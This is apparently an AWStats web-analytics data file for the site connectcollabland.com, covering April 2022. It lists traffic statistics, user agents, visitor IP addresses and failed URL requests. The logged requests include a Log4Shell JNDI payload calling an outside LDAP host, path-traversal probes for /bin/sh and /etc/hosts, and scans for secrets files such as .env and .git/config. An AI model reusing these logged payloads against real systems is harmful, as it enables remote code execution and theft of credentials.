AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202204 will be lost/reset.
# Last config file used to build this data file was /home/yvvhtadv/tmp/awstats/ssl/awstats.connectcollabland.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2022                
POS_TIME 2706                
POS_VISITOR 15509               
POS_DAY 24478               
POS_DOMAIN 3551                
POS_LOGIN 4207                
POS_ROBOT 4362                
POS_WORMS 5027                
POS_EMAILSENDER 5158                
POS_EMAILRECEIVER 5301                
POS_SESSION 24906               
POS_SIDER 25113               
POS_FILETYPES 5436                
POS_DOWNLOADS 5636                
POS_OS 5684                
POS_BROWSER 6040                
POS_SCREENSIZE 7833                
POS_UNKNOWNREFERER 7907                
POS_UNKNOWNREFERERBROWSER 9083                
POS_ORIGIN 10005               
POS_SEREFERRALS 10145               
POS_PAGEREFS 10325               
POS_SEARCHWORDS 10530               
POS_KEYWORDS 10682               
POS_MISC 2369                
POS_ERRORS 10741               
POS_CLUSTER 4063                
POS_SIDER_404 10828               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20220414051113 797 200434 12068948230194
FirstTime 20220401005541
LastTime 20220414051113
LastUpdate 20220414053052 797 0 797 0 0
TotalVisits 357                 
TotalUnique 222                 
MonthHostsKnown 0                   
MonthHostsUnknown 224                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
AddToFavourites 0 76 0
WindowsMediaPlayerSupport 0 0 0
PDFSupport 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
QuickTimeSupport 0 0 0
JavascriptDisabled 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
JavaEnabled 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 27 45 981934 99 107 124229
1 18 18 681408 105 125 677464
2 20 20 757120 107 108 249159
3 17 27 647879 49 50 128974
4 9 9 340704 36 37 113568
5 25 25 877305 154 155 173447
6 22 22 832832 106 110 393966
7 7 7 264992 31 34 242542
8 25 175 7500734 74 77 128974
9 25 127 4225778 71 76 64350
10 11 11 416416 80 85 37856
11 47 257 8458551 135 151 471294
12 40 192 7563733 167 173 377060
13 83 655 21618820 210 222 97614
14 16 83 3855823 69 75 117612
15 52 310 8335843 48 55 230180
16 23 89 4098849 67 70 128974
17 21 21 794976 47 52 106524
18 17 39 1368324 20 26 250904
19 36 205 7686626 91 93 11088
20 22 40 786037 62 66 273354
21 48 288 8757379 97 111 282942
22 31 103 1137550 49 78 185187
23 22 112 4492524 52 59 114367
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 29
us 259 453 12881706
ca 85 790 31793624
gb 50 134 5121190
in 47 47 1703520
ve 34 370 14011536
ua 24 229 3902134
pk 24 132 1420971
de 21 124 3976571
cn 20 64 2092009
ee 20 236 10255969
ru 16 16 605696
mx 15 134 3750445
se 8 8 302848
pl 7 91 3499321
au 4 4 151424
hu 4 22 142485
nl 4 4 151424
gr 4 4 151424
kr 3 3 0
zz 3 3 113568
dk 2 2 75712
ao 2 2 75712
es 2 2 75712
fr 1 1 37856
cz 1 1 37856
ne 1 1 37856
tr 1 1 37856
at 1 1 37856
eu 1 1 37856
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 13
no_user_agent 44 1514240 20220413213905 0
bingbot/ 22 548490 20220412012531 0
Applebot/ 14 529984 20220413062425 0
YandexBot/ 11 325688 20220412112932 0
curl 10 340704 20220408120055 0
(firefox/)([0-9]\.|[0-1][0]\.) 9 278226 20220414045251 0
facebookexternalhit/ 7 46319 20220414001038 0
Apache\-HttpClient/ 4 151424 20220405213510 0
Discordbot/ 4 273854 20220411155827 0
Go\-http\-client/ 3 113568 20220413044420 0
libwww\-perl 1 37856 20220406012657 0
survey 1 37856 20220404200118 0
bot[\s_+:,\.\;\/\\-] 1 37856 20220408171355 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 7
css 259 859565 0 0
jpg 207 3354582 0 0
html 646 17719374 0 0
png 1064 64357182 0 0
js 640 9876458 0 0
webp 46 314292 0 0
php 18 684 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 0
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 22
ios_iphone 482 44
linux 89 35
win7 25 12
macosx14 1 1
winlong 3 3
winxp 6 6
win8 3 3
androidkitkat 7 7
win8.1 1 1
macosx15 210 39
macosx11 7 7
win10 1783 403
android10 45 9
androidoreo 1 1
Unknown 71 71
android 115 13
macosx 24 2
ios_ipad 1 1
macosx10 2 2
macosx9 2 2
unix 1 1
macosx13 1 1
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 80
chrome83.0.4103.106 8 8
chrome95.0.4638.54 3 3
chrome91.0.4472.106 6 6
chrome96.0.4664.45 4 4
chrome93.0.4577.82 21 4
chrome100.0.4896.88 230 26
android 7 7
chrome87.0.4280.141 1 1
chrome100.0.4896.58 22 4
chrome45.0.2454.85 1 1
safari 302 20
chrome41.0.2226.0 4 4
chrome78.0.3904.87 12 2
chrome91.0.4472.114 3 3
chrome60.0.3112.113 40 40
chrome100.0.4896.79 1085 104
chrome83.0.4103.97 4 4
chrome29.0.1547.57 1 1
chrome11.0.696.71 1 1
chrome34.0.1847.137 1 1
chrome98.0.4758.109 70 4
chrome66.0.3359.181 1 1
msie9.0 1 0
chrome70.0.3538.77 3 3
chrome30.0.1599.13014 1 1
chrome67.0.3396.79 1 1
iphone 23 5
chrome51.0.2704.84 1 1
chrome45.0.2454.101 3 3
firefox83.0 1 1
chrome91.0.4472.164 1 1
chrome84.0.4147.105 1 1
chrome41.0.2272.89 1 1
chrome76.0.3809.71 22 4
netscape5.0 23 23
firefox51.0 1 1
safari15.1 22 4
chrome100.0.4896.60 91 7
chrome88.0.4324.190 1 1
chrome74.0.3729.169 2 2
safari15.4 135 15
firefox95.0 1 1
firefox47.0 5 5
firefox73.0 3 3
chrome74.0.3729.131 2 2
chrome99.0.4844.84 66 12
firefox79.0 1 1
chrome99.0.4844.88 92 8
msie6.0 1 1
chrome49.0.2623.112 14 2
chrome53.0.3032.91 1 1
firefox65.0 1 1
Unknown 34 34
chrome41.0.2227.1 2 2
chrome96.0.4664.110 2 2
chrome27.0.1453.93 1 1
chrome99.0.4844.51 22 4
chrome98.0.4758.102 22 4
safari11.0 1 1
chrome100.0.4896.75 203 32
firefox91.0 2 2
chrome78.0.3904.108 104 104
chrome35.0.1916.47 1 1
chrome88.0.4240.193 30 30
chrome96.0.4664.55 1 1
chrome95.0.4638.69 10 10
chrome55.0.2883.87 3 3
chrome41.0.2228.0 3 3
chrome76.0.3809.100 3 3
chrome81.0.4044.129 9 9
chrome89.0.4389.114 24 24
chrome50.0.2661.102 1 1
chrome79.0.3945.88 1 1
chrome35.0.2309.372 1 1
chrome83.0.4103.61 2 2
mozilla 16 16
chrome79.0 6 6
chrome41.0.2225.0 2 2
chrome41.0.2224.3 2 2
chrome87.0.4280.88 24 2
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 16
https://gdnplus.com:Gather_Analyze_Provide. 20220413031310
NetSystemsResearch_studies_the_availability_of_various_services_across_the_internet._Our_website_is_netsystemsresearch.com 20220410130428
HTTP_Banner_Detection_(https://security.ipip.net) 20220413062727
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20220413180649
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20220405204017
python-requests/2.27.1 20220413154331
Mozilla/5.0_zgrab/0.x 20220414010035
python-requests/2.22.0 20220406012859
'Mozilla/5.0_project_patchwatch' 20220407163842
Python/3.7_aiohttp/3.7.4.post0 20220406173057
l9tcpid/v1.1.0 20220405020912
Mozilla/5.0 20220409095213
${jndi:ldap://115.28.134.231:1389/Exploit} 20220403005745
WhatsApp/2.22.6.72_A 20220413134219
Python/3.6_aiohttp/3.7.4.post0 20220410195611
Mozilla/5.0_(compatible;_ips-agent) 20220401233423
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 11
python-requests/2.22.0 20220406012859
Python/3.7_aiohttp/3.7.4.post0 20220406173057
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20220405204017
python-requests/2.27.1 20220413154331
NetSystemsResearch_studies_the_availability_of_various_services_across_the_internet._Our_website_is_netsystemsresearch.com 20220410130428
HTTP_Banner_Detection_(https://security.ipip.net) 20220413062727
https://gdnplus.com:Gather_Analyze_Provide. 20220413031310
Python/3.6_aiohttp/3.7.4.post0 20220410195611
${jndi:ldap://115.28.134.231:1389/Exploit} 20220403005745
WhatsApp/2.22.6.72_A 20220413134219
l9tcpid/v1.1.0 20220405020912
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 436 449
From1 0 0
From2 5 5
From3 1 12
From4 222 2414
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 2
www_google_com 3 3
www_bing_com 2 2
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 2
http://142.11.214.168:80 1 1
https://142.11.214.168 0 11
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 1
404 1986 0
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 145
/admin.php 1 https://connectcollabland.com/
/docs/cplugError.html/ 1 -
/telescope/requests 1 -
/connect_files/framework-8e528b732ab2eaadb7b7.js.map 1 -
/wp-login.php 1 -
/info.php 2 -
//feed/ 6 -
//blog/wp-includes/wlwmanifest.xml 73 -
/dana-na/auth/url_default/welcome.cgi 1 -
/console/ 6 -
/admin/config.php 7 -
/sdk 1 -
/base.jsp 1 -
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 19 -
/admin/login 1 https://connectcollabland.com/
/system_api.php 2 -
//xmlrpc.php 73 -
/.json 2 -
/s/lkx/_/ 2 -
/server-status 3 -
//2018/wp-includes/wlwmanifest.xml 37 -
/Portal0000.htm 1 -
/resolve 4 -
/apple-touch-icon-precomposed.png 7 -
/actuator/health 5 -
/api/search 1 -
/connect_files/apple-touch-icon.ico 25 -
/${jndi:ldap://115.28.134.231:1389/Exploit} 1 -
/mifs/. 7 https://142.11.214.168:443
/login.html 1 https://connectcollabland.com/
/login.aspx 1 https://connectcollabland.com/
/ 69 -
/.DS_Store 4 -
//shop/wp-includes/wlwmanifest.xml 70 -
/cgi-bin/../../../../bin/sh 6 -
/admin/login.php 1 https://connectcollabland.com/
/admin/login.aspx 1 https://connectcollabland.com/
/.well-known/security.txt/ 1 -
//website/wp-includes/wlwmanifest.xml 70 -
/solr/admin/collections 1 -
/admin/ 2 -
/dqgqoeCXckuwPtxov 2 -
//2019/wp-includes/wlwmanifest.xml 67 -
/actuator/env 1 -
/nmaplowercheck1649444445 1 -
/aaa9 1 -
/spog/welcome 1 -
/Autodiscover/Autodiscover.xml 8 -
/connect_files/commons-f6a61b4b9e4743f32af5.js.map 1 -
/connect_files/component---src-pages-wallets-tsx-a8515f9109ae96b14573.js.map 1 -
/config.json 1 -
/inicio.jsa 1 -
//wp2/wp-includes/wlwmanifest.xml 70 -
/admin/login.asp 1 https://connectcollabland.com/
/admin/index.php 1 https://connectcollabland.com/
/logon/LogonPoint/custom.html 1 -
//2020/wp-includes/wlwmanifest.xml 33 -
//cms/wp-includes/wlwmanifest.xml 73 -
/_ignition/execute-solution 8 -
/streaming/clients_live.php 2 -
/owa/ 1 -
/apple-touch-icon.png 7 -
/c/version.js 2 -
/sitemap.xml 2 -
/users/sign_in 1 -
//wp/wp-includes/wlwmanifest.xml 73 -
/.git/config 12 -
/GponForm/diag_Form 11 -
/.env 42 -
/tBt2 1 -
/admin/login.html 1 https://connectcollabland.com/
/index.aspx 1 -
//site/wp-includes/wlwmanifest.xml 73 -
/www.google-analytics.com/analytics.html 41 https://connectcollabland.com/connect.html
//media/wp-includes/wlwmanifest.xml 37 -
//wp-includes/wlwmanifest.xml 67 -
/evox/about 1 -
/owa/auth/logon.aspx 19 -
/start.jhtml 1 -
//wp1/wp-includes/wlwmanifest.xml 73 -
/menu.aspx 1 -
/HNAP1 2 -
/fm/messagebroker/amfsecure 1 -
/dana-na/auth/url_3/welcome.cgi 1 -
/admin/login/ 1 https://connectcollabland.com/
/CSS/Miniweb.css 1 -
/login.asp 1 https://connectcollabland.com/
/pools 1 -
/solr/ 1 -
/login/ 1 https://connectcollabland.com/
/portal/webclient/index.html 2 -
/robots.txt 14 -
/page-data/app-data.json 159 https://connectcollabland.com/connect.html
/Portal/Portal.mwsl 1 -
/index.php 8 -
/stream/live.php 2 -
/frontend_dev.php/$ 2 -
/stalker_portal/c/version.js 2 -
/webfig/ 1 -
//news/wp-includes/wlwmanifest.xml 70 -
/ajax 2 -
/page-data/connect.html/page-data.json 43 https://connectcollabland.com/connect.html
/.well-known/security.txt 1 -
/Login 1 https://connectcollabland.com/
/actuator/gateway/routes 7 -
//wordpress/wp-includes/wlwmanifest.xml 73 -
//test/wp-includes/wlwmanifest.xml 73 -
/.git/HEAD 1 -
/jenkins/login 1 -
/connect_files/app-2b5a75f35e7d5a1e67ad.js.map 1 -
/pools/default/buckets 1 -
/XgUH 1 -
///remote/fgt_lang 4 -
//2021/wp-includes/wlwmanifest.xml 6 -
/login 5 -
/scripts/WPnBr.dll 1 -
/dana-na/auth/url_2/welcome.cgi 1 -
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 8 -
/__Additional 1 -
/indice.jhtml 1 -
/bag2 1 -
/cgi-bin/../../../../../../../../../etc/hosts 4 -
/login.php 1 https://connectcollabland.com/
//sito/wp-includes/wlwmanifest.xml 70 -
/dns-query 4 -
/menu.jsa 1 -
/query 4 -
/logon/LogonPoint/index.html 1 -
/connect_files/webpack-runtime-f05eb26eb8430bd144ce.js.map 1 -
/nmaplowercheck1649379719 1 -
/M1wg 1 -
/login.action 1 -
/ReportServer 2 -
/epa/scripts/win/nsepa_setup.exe 1 -
/localstart.asp 1 -
/flu/403.html 2 -
/showLogin.cc 1 -
//web/wp-includes/wlwmanifest.xml 73 -
/suite-api/api/auth/token/acquire 1 https://142.11.214.168/ui/
/owa/auth/x.js 4 -
/page-data/404.html/page-data.json 44 https://connectcollabland.com/connect.html
/CMSPages/logon.aspx 1 https://connectcollabland.com/
/script 1 -
/manager/html 1 -
/PtQG 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 224
45.155.204.146 30 30 1135680 20220413163631
201.249.147.84 27 279 10518154 20220413191701
72.141.82.167 25 112 3506882 20220407132614
99.247.226.236 20 302 13843488 20220405095850
82.131.94.243 20 236 10255969 20220410144507
128.199.198.204 16 16 605696 20220413050625
24.203.253.206 15 183 6986764 20220410130950
139.28.218.21 12 115 3635867 20220412214438
39.33.211.203 11 65 427225 20220413223415
20.114.250.118 11 11 416416 20220404222026
189.152.33.195 11 112 3607960 20220411155915
159.223.72.185 10 10 378560 20220408000723
104.244.73.13 9 94 3499999 20220407120001
39.37.221.85 9 45 851261 20220413215716
37.19.213.249 9 94 3521046 20220410155904
207.148.127.236 8 8 302848 20220409090205
167.172.86.173 8 8 302848 20220405232147
217.138.200.164 7 91 3493382 20220411155929
128.14.134.134 7 7 264992 20220413192229
190.202.180.127 7 91 3493382 20220413134339
87.101.92.85 7 91 3499321 20220405231841
37.19.213.154 7 91 96118 20220407131358
35.233.62.116 6 6 227136 20220412155049
45.144.154.93 6 6 227136 20220410091909
194.233.69.193 6 6 227136 20220411104051
23.129.64.139 1 1 37856 20220413062408
128.14.133.58 1 1 37856 20220413220528
41.203.140.114 1 1 37856 20220403005745
66.240.192.82 1 1 37856 20220407163842
142.234.203.235 1 1 37856 20220413143305
154.209.125.49 2 2 75712 20220413012255
64.227.130.7 1 1 37856 20220413023814
103.203.57.10 2 2 75712 20220408201813
80.82.77.139 1 1 37856 20220410173528
193.118.53.202 2 2 75712 20220407021410
184.151.190.55 4 22 173724 20220404093754
104.206.128.74 1 1 37856 20220413031310
92.204.175.88 1 1 37856 20220405061108
195.154.176.213 1 1 37856 20220411134633
130.61.127.96 4 4 151424 20220407165815
54.241.142.170 1 1 37856 20220403210602
128.14.134.170 4 4 151424 20220408045546
20.127.43.36 2 2 75712 20220404115715
106.75.85.103 1 7 340751 20220401110722
20.65.79.204 2 2 75712 20220404000939
65.21.206.43 1 1 37856 20220401020249
54.227.32.154 5 5 189280 20220405215648
3.92.54.46 4 22 142485 20220413214516
167.94.138.62 1 1 37856 20220411064723
188.120.229.159 1 1 37856 20220407230913
185.180.143.7 3 3 113568 20220408003402
8.31.2.98 1 1 37856 20220412180019
66.42.60.163 4 4 151424 20220413154430
137.184.142.139 1 1 37856 20220413155918
171.13.14.76 1 11 73422 20220410032519
192.241.222.116 1 1 37856 20220404173730
142.93.166.118 1 1 37856 20220406003558
159.203.94.59 1 1 37856 20220404204534
3.237.88.19 1 1 6617 20220409111549
138.197.202.199 3 3 113568 20220405082246
178.62.126.89 1 1 37856 20220401180049
134.209.204.196 1 1 37856 20220407145113
185.181.60.189 1 1 37856 20220407190953
112.223.101.156 1 1 0 20220404222154
23.92.19.27 1 1 37856 20220402015958
119.160.64.220 4 22 142485 20220413220844
134.122.13.255 1 1 37856 20220406151755
157.245.201.126 1 1 37856 20220401063247
162.142.125.8 1 1 37856 20220409184501
20.124.128.86 4 4 151424 20220412111304
45.83.64.71 1 1 37856 20220413000717
167.94.138.118 1 1 37856 20220402134550
106.75.134.236 1 7 340751 20220402231729
183.136.225.35 1 1 37856 20220413035406
165.22.244.156 1 1 37856 20220414035651
223.71.167.164 1 1 37856 20220410165552
199.7.157.120 4 22 173724 20220404155950
71.6.232.7 2 2 75712 20220411181346
38.18.54.111 1 1 6617 20220401005541
20.106.99.122 2 2 75712 20220403025419
192.241.217.107 1 1 37856 20220401054500
3.138.126.116 4 22 142485 20220406152524
159.65.200.34 2 2 75712 20220405020912
192.241.222.234 1 1 37856 20220402115840
144.172.73.50 1 1 37856 20220410021805
128.14.209.162 3 3 113568 20220406085751
130.211.54.158 2 2 75712 20220406171018
62.178.170.93 1 1 37856 20220401141358
20.101.106.180 4 4 151424 20220405191837
34.217.47.175 1 1 37856 20220407224257
162.142.125.212 1 1 37856 20220411164549
198.46.195.155 1 1 37856 20220405181505
104.45.194.225 1 1 37856 20220401064312
167.94.138.60 1 1 37856 20220403030416
92.118.161.45 1 1 37856 20220404222401
34.142.128.162 2 2 75712 20220407213632
174.138.21.64 2 2 75712 20220405080738
20.108.4.180 1 1 37856 20220403212717
159.65.242.215 1 1 37856 20220406102611
23.251.102.74 4 4 151424 20220412232021
37.19.212.119 4 22 142485 20220411155822
45.129.18.250 1 1 0 20220403155216
20.212.113.178 4 4 151424 20220408012350
51.142.140.150 4 4 151424 20220409014333
37.111.130.112 4 22 142485 20220404093825
157.230.43.70 6 6 227136 20220404172821
164.92.252.4 1 1 37856 20220405024200
20.219.13.246 2 2 75712 20220407121712
92.118.160.17 2 2 75712 20220410115033
35.195.93.98 3 3 113568 20220413154331
66.240.236.109 1 1 37856 20220406080523
162.142.125.9 1 1 37856 20220413180649
54.71.11.6 1 1 37856 20220406205324
174.138.61.44 1 1 37856 20220404190913
13.38.7.141 1 1 0 20220406161301
72.137.55.47 4 70 3417441 20220405211857
219.254.214.15 1 1 0 20220405215637
208.80.194.41 1 1 37856 20220406064714
20.70.25.245 2 2 75712 20220410213307
162.221.192.26 3 3 113568 20220413084734
156.146.50.169 1 1 0 20220404204016
139.59.113.231 2 2 75712 20220401173938
175.207.250.85 1 1 0 20220403125447
164.92.185.57 1 1 37856 20220406012859
192.241.214.172 1 1 37856 20220404142756
144.202.31.91 3 3 113568 20220413033314
101.68.211.3 1 1 37856 20220406184132
162.214.78.146 1 1 37856 20220404071126
94.247.172.129 1 1 37856 20220409152637
211.95.50.8 2 17 610005 20220412180110
192.241.212.156 1 1 37856 20220411010417
37.204.247.75 1 1 37856 20220403125450
221.2.155.200 4 4 151424 20220404042429
207.46.13.132 0 1 18302 
161.35.188.242 1 1 37856 20220403052650
103.203.57.25 4 4 151424 20220414020740
72.13.46.6 3 3 236036 20220401233423
5.188.62.21 4 4 151424 20220414051113 20220414043918 /
165.227.100.2 1 1 37856 20220413140520
162.142.125.221 1 1 37856 20220408191106
167.94.138.44 1 1 37856 20220406231746
66.240.236.116 2 2 75712 20220413153145
35.87.207.165 1 1 37856 20220411201532
167.99.127.71 1 1 37856 20220413050740
23.129.64.216 1 1 37856 20220404002300
107.174.235.147 1 1 37856 20220406093252
164.52.24.162 1 1 37856 20220413130303
167.99.68.50 2 2 75712 20220412075026
20.122.134.71 2 2 75712 20220408114538
139.59.225.119 2 2 75712 20220401120335
34.86.35.29 1 1 37856 20220405204017
54.237.250.240 4 4 151424 20220405215643
129.233.182.209 1 1 37856 20220410195611
18.119.130.73 4 22 142485 20220401111456
162.142.125.7 1 1 37856 20220404113752
213.32.122.82 2 2 75712 20220412062800
20.226.51.161 2 2 75712 20220413205701
66.115.145.52 4 22 142485 20220413213707
209.141.51.49 1 1 37856 20220412180104
168.91.87.246 1 1 37856 20220401231350
13.209.16.127 1 1 37856 20220408220232
62.197.136.10 1 1 37856 20220406173057
211.95.50.7 0 7 190479 
162.142.125.220 2 2 75712 20220402061422
96.20.0.6 4 70 3350897 20220407124003
92.118.160.61 1 1 37856 20220410130428
23.129.64.217 1 1 37856 20220407072803
51.142.111.189 2 2 75712 20220402120832
120.35.11.210 2 2 75712 20220413190926
65.154.226.167 4 22 142485 20220410004530
152.69.187.69 4 4 151424 20220409224007
193.118.53.194 1 1 37856 20220401133541
209.127.109.180 1 1 37856 20220405204948
5.62.20.18 1 1 37856 20220412140203
192.53.170.163 1 1 37856 20220412184111
103.203.59.1 2 2 75712 20220413062727
20.25.65.63 1 1 37856 20220406215104
42.83.147.34 2 2 75712 20220409112216
37.19.213.75 4 22 142485 20220407113444
54.159.236.1 1 1 37856 20220405094637
5.188.62.76 6 6 227136 20220410182227
168.138.1.244 4 4 151424 20220409000651
52.27.61.7 1 1 37856 20220406205259
20.58.167.155 1 1 37856 20220407125620
20.120.27.154 1 1 37856 20220406065923
18.192.129.10 1 1 37856 20220401153230
45.128.199.135 1 1 37856 20220405101728
94.102.61.8 1 1 37856 20220407081405
128.1.248.42 3 3 113568 20220411201907
103.137.71.130 1 1 0 20220414050848 20220414050848 /
81.39.111.122 2 2 75712 20220408005702
161.35.86.181 1 1 37856 20220405020609
23.94.186.34 1 1 37856 20220401180943
35.88.90.115 1 1 37856 20220411201546
3.86.101.74 1 1 37856 20220407164929
52.224.59.238 2 2 75712 20220401111452
93.158.91.250 1 1 37856 20220407203409
60.217.75.69 2 2 75712 20220409095213
192.241.222.176 1 1 37856 20220414010035
189.198.130.198 4 22 142485 20220411155913
104.206.128.18 1 1 37856 20220408234651
44.192.130.218 1 1 6617 20220409054609
141.147.113.25 6 6 227136 20220414032357
139.162.207.84 1 1 37856 20220405004051
45.61.146.242 1 1 37856 20220412162508
171.13.14.57 1 1 6617 20220410032444
128.14.141.34 3 3 113568 20220405172421
59.36.168.250 1 1 37856 20220403031543
18.217.17.84 4 22 142485 20220411205722
97.74.84.214 1 1 37856 20220403000225
20.123.155.236 2 2 75712 20220413123917
89.187.168.138 1 1 37856 20220407062948
194.49.78.103 1 1 37856 20220412063433
193.118.53.210 3 3 113568 20220413151639
34.140.248.32 2 2 75712 20220411160309
13.69.133.104 1 1 37856 20220408071302
192.241.224.155 1 1 37856 20220406152715
198.46.193.213 1 1 37856 20220408105142
192.241.212.203 1 1 37856 20220408000852
167.94.146.60 1 1 37856 20220405054812
159.223.50.155 1 1 37856 20220413002709
212.115.42.248 1 1 37856 20220401162405
167.172.74.250 6 6 227136 20220404054918
128.1.248.26 1 1 37856 20220406005537
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 14
20220401 44 68 2050849 30
20220402 26 32 1287151 21
20220403 30 30 1059968 25
20220404 60 180 5497326 39
20220405 71 437 18970617 38
20220406 36 54 1316021 30
20220407 84 509 15111875 29
20220408 45 129 4931910 24
20220409 18 18 618930 13
20220410 63 476 18250041 23
20220411 49 288 8248061 22
20220412 31 155 5117759 18
20220413 98 495 13718781 39
20220414 9 9 302848 6
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
0s-30s 337
30s-2mn 4
5mn-15mn 2
30mn-1h 3
2mn-5mn 4
15mn-30mn 2
1h+ 3
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 8
/ 448 15413697 352 319
/connect.html 45 2259762 5 9
/_https_/thumb.tildacdn.com/tild3431-3866-4662-a331-643666303162/-/format/webp/Handshake_CollabLand.html 36 8131 0 2
/_https_/static.tildacdn.com/tild6635-3136-4131-b235-626631383863/-/resize/20x/Handshake_CollabLand.html 36 7927 0 3
/_https_/thumb.tildacdn.com/tild6635-3136-4131-b235-626631383863/-/format/webp/Handshake_CollabLand.html 35 7901 0 11
/connect_files/analytics_002.html 23 7084 0 8
/connect_files/analytics.html 23 14872 0 0
/action.php 18 684 0 3
END_SIDER
